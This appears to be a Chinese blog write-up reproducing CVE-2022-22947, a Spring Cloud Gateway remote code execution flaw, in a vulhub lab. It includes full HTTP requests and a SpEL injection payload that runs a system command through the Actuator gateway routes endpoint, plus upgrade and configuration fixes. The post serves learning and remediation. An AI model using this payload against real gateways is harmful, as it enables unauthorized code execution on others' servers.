Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

最新推荐文章于 2024-06-18 10:41:52 发布
最新推荐文章于 2024-06-18 10:41:52 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: 渗透测试 渗透实验 安全漏洞 文章标签: 安全 web安全 安全漏洞 渗透测试 Spring Cloud
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125391865
版权

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

一、漏洞描述

Spring Cloud Gateway是Spring Cloud官方推出的第二代网关框架,取代Zuul网关。网关作为流量的,在微服务系统中有着非常作用,网关常见的功能有路由转发、权限校验、限流控制等作用。

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,其在启用、公开、不安全、攻击者可以访问Actuator API的情况下,容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求

二、影响版本

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway < 3.0.7

三、环境搭建

搭建的环境是在centos中搭建了vulhub靶机

启动靶机:

cd vulhub-master/spring/CVE-2022-22947

docker-compose up -d

访问:http://192.168.199.52:8080/

四、漏洞复现

1、添加一个spel表达式的路由

访问:http://192.168.199.52:8080/actuator/gateway/routes/xd

使用burp抓包

数据包如下:

POST /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Accept-Language: en
Content-Type: application/json
Content-Length: 366


{
      "id": "xd",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
        }],
      "uri": "http://example.com",
      "order": 0
}

2、促发路由生效

访问:http://192.168.199.52:8080/actuator/gateway/refresh

数据包如下:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

3、查看执行结果

访问:http://192.168.199.52:8080/actuator/gateway/routes/xd

数据包:

GET /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

4、清理路由、

访问:192.168.199.52:8080/actuator/gateway/routes/xd

数据包如下:

DELETE /actuator/gateway/routes/xd HTTP/1.1
Host: 192.168.199.52:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5、重复步骤2,让清除路由生效

批量检测漏洞工具:

https://github.com/Xd-tl/CVE-2022-22947-Rce_POC

五、修复建议

1、3.1.x 版本用户应升级到 3.1.1+ 版本,3.0.x 版本用户应升级到 3.0.7+ 版本。

2、在不影响业务的前提下,通过将配置选项 management.endpoint.gateway.enabled 设置为 false 禁用 gateway actuator endpoint。

参考链接:Spring Cloud Gateway_CVE-2022-22947漏洞复现_安全混子的博客-CSDN博客

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7464
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现
Spring Cloud GatewayCVE-2022-22947漏洞复现
weixin_45095113的博客
07-28 2350
Spring Cloud GatewayCVE-2022-22947漏洞复现
SpringCloud Gateway 远程代码执行漏洞
最新发布
qq_33240556的博客
06-18 471
Spring Cloud Gateway(SCG)本身并没有远程代码执行漏洞,但是,如果你在配置过程中使用了不安全代码或者依赖,可能会引入安全风险。:类似地,如果过滤器配置中的某些参数来自用户输入,且没有进行充分验证和过滤,也可能会被利用来执行远程代码。在使用自定义过滤器时,要确保传入过滤器的参数是安全的。:SCG依赖的其他库或组件可能存在安全漏洞,攻击者可以利用这些漏洞执行远程代码。字段来自用户输入,且没有进行严格的验证和过滤,可能会被攻击者利用来执行远程代码。,就需要格外注意输入的合法性。
Spring Cloud Gateway中存在远程代码执行漏洞容易受到代码注入攻击
happy_a_bin的博客
04-20 694
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。二、影响版本 Spring Cloud Gateway 3.1.0 Spring Cloud Gateway 3.0.0 - 3.0.6 Spring Cloud Gateway 其它不支持的、已不再更新的版本 三、处置措施 1、立刻升级至3.0.7以上(不含3.1.0)或3.1.1以上;
春秋云镜 CVE-2022-22947
qq_22002773的博客
07-18 365
春秋云镜 CVE-2022-22947
突发!Spring Cloud 再爆高危漏洞。。赶紧修复!!
AI研习社
03-03 604
开发者(KaiFaX)面向全栈工程师的开发者专注于前端、Java/Python/Go/PHP的技术社区Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring ...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
SpringCloud Gateway 漏洞分析 (CVE-2022-22947).doc
07-08
SpringCloud Gateway 漏洞分析 (CVE-2022-22947) SpringCloud GatewaySpring 提供的微服务实现框架,其中包含网关、配置中心和注册中心等内容。网关是 SpringCloud Gateway 的核心组件之一,提供了统一的流量...
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
热门推荐
xiaobai_20190815的博客
04-08 1万+
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 3月1日,VMware发布安全公告,Spring Cloud Gateway中存在远程代码执行漏洞CVE-2022-22947),该漏洞的CVSSv3评分为10.0。当启用或暴露不安全Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序容易受到代
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3340
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
spring_cloud_rce(CVE-2022-22947)漏洞复现
3tefanie丶zhou的博客
03-19 5375
【自己觉得不好的事情,就干脆不要有第一次,一次也不要做,一小步也不能走出去,要不然回头来看,吃亏吃苦的还是自己。】
Spring Cloud Gateway_CVE-2022-22947漏洞复现
混子
03-05 4810
目录 漏洞描述 影响版本 漏洞复现 环境搭建 过程 批量url检测 漏洞修复 漏洞描述 Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947
初岄的博客
07-09 865
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
weixin_42299610的博客
06-02 945
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
Spring Cloud 再爆高危漏洞.... 赶紧修复
终码一生
03-07 5139
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X 问题描述: Spring Cloud GatewaySpring Cloud .
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)修复建议
lujiawei00的专栏
03-04 1131
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)修复建议
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值